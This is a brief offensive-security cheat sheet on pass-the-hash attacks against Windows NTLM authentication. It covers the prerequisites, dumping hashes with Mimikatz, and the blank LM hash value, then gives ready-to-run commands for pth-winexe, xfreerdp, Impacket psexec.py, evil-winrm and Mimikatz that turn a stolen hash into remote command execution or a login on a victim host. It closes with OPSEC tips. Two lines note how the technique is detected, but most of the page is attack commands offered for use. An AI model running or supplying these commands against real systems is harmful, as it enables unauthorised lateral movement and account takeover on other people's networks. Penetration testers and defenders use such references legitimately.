Pass-the-hash (PtH) attacks work on Windows systems/services that use NetNTLM authentication. The plaintext password is not needed, instead the hash alone is sufficient.

Requirements

  • SMB connection
  • local admin credentials / privileges to connect to Admin$ SMB share
  • File and Print Sharing feature must be enabled
  • Local admin NTLM hash (use Mimikatz to dump)

Security Update

After the 2014 security update, PtH will work only on domain users and the built-in Administrator account (excluding other local admin accounts).

  • PtH may be detected by:
    • looking for new R/W handle to LSASS
    • looking for echo $hex1 > \\.\pipe\$hex2 patterns in command logs, which is how Mimikatz does it
  • RTO: “Suspicious Handle to LSASS” saved search

Some tools also asks for a LM hash. If the user has no LM hash (i.e. only NTLM hash), use aad3b435b51404eeaad3b435b51404ee (which is a blank hash, i.e. LM hash of empty string).

Tools

Note: Cobalt Strike also supports pth through built-in Mimikatz.

# RCE, no output, Linux only
pth-winexe -U $USER%$LM_HASH:$NTLM_HASH //$HOST $CMD
 
# RDP
xfreerdp /v:VICTIM_IP /u:DOMAIN\\MyUser /pth:$NTLM_HASH
 
# psexec.py from Impacket
psexec.py -hashes $LM_HASH:NTLM_HASH DOMAIN/MyUser@VICTIM_IP
 
# WinRM via evil-winrm
evil-winrm -i VICTIM_IP -u MyUser -H NTLM_HASH
 
# Mimikatz (pivots to user by opening a new terminal window)
mimikatz "sekurlsa::pth /user:jsmith /domain:example.com /ntlm:aabbccddeeff..." "exit"

Warning & OPSEC

Only the linux version of psexec support PtH. Sometimes psexec.py will automatically elevate to NT AUTHORITY\SYSTEM when user has enough privileges, which may not be preferable.

See also pass-the-key for Kerberos authenticatoin.